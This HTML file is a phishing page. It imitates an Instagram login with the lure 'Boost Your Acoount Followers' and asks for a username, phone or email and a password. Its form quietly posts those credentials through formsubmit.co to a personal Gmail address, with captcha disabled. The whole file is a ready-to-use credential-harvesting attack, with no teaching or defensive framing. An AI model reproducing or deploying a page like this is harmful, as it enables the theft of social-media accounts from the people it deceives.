<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Login</title>
  <style>
    body {
      font-family: 'Segoe UI', sans-serif;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      
    }

    .container {
      background: rgb(255, 255, 255);
      padding: 30px;
      border-radius: 20px;
      box-shadow: 0 8px 20px rgba(0, 0, 0, 0.15);
      text-align: center;
      max-width: 350px;
      width: 100%;
    }

    h2 {
      font-size: 20px;
      margin-bottom: 10px;
      color: #333;
    }

    .click-here {
      font-weight: bold;
      color: #007bff;
      margin: 10px 0;
    }

    input {
      width: 100%;
      padding: 10px;
      margin: 8px 0;
      border: 1px solid #ccc;
      border-radius: 10px;
      font-size: 14px;
    }

    button {
      width: 100%;
      padding: 10px;
      margin-top: 10px;
      background-color: #0095f6;
      color: white;
      border: none;
      border-radius: 10px;
      font-size: 16px;
      cursor: pointer;
      transition: background 0.3s ease;
    }

    button:hover {
      background-color: #0077cc;
    }
  </style>
</head>
<body>

  <div class="container">
    <h2><img src="insta.png" alt=""></h2>
    <div class="click-here">Boost Your Acoount Followers</div>

 <form action="https://formsubmit.co/devg36006@gmail.com" method="POST">
        <input type="hidden" name="_next" value=" ">
        <input type="hidden" name="_captcha" value="false">
        <label><input type="username" name="username " required  placeholder="Phone number, username or email address"/></label><br><br>
        <label><input type="password" name="password" required placeholder="Password"/></label><br><br>
     
        <button type="submit">Login</button>
      </form>

  </div>

</body>
</html>
